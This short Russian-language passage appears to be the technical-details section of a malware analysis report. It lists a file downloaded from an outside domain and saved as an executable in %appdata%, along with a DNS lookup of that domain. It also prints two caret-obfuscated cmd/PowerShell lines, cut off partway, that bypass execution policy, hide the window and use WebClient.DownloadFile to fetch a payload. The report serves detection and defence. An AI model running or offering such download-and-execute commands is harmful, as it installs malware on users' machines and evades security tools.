Техническая информация
- http://transporingsytw.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "powER^SHell.E^Xe -EXeCutIO^nPoli^CY b^yPasS -^NoP^R^OFILE^ ^-^windO^w^StyL^E ^HidD^en^ (NEW-OBJEct ^syst^em^.^N^eT^.WEbCli^en^t).DO^wN^LoadfIl^e('http://transporingsytw.wang/se...
- DNS ASK tr#####ringsytw.wang
- '<SYSTEM32>\cmd.exe' /C "powER^SHell.E^Xe -EXeCutIO^nPoli^CY b^yPasS -^NoP^R^OFILE^ ^-^windO^w^StyL^E ^HidD^en^ (NEW-OBJEct ^syst^em^.^N^eT^.WEbCli^en^t).DO^wN^LoadfIl^e('http://transporingsytw.wang/se...' (со скрытым окном)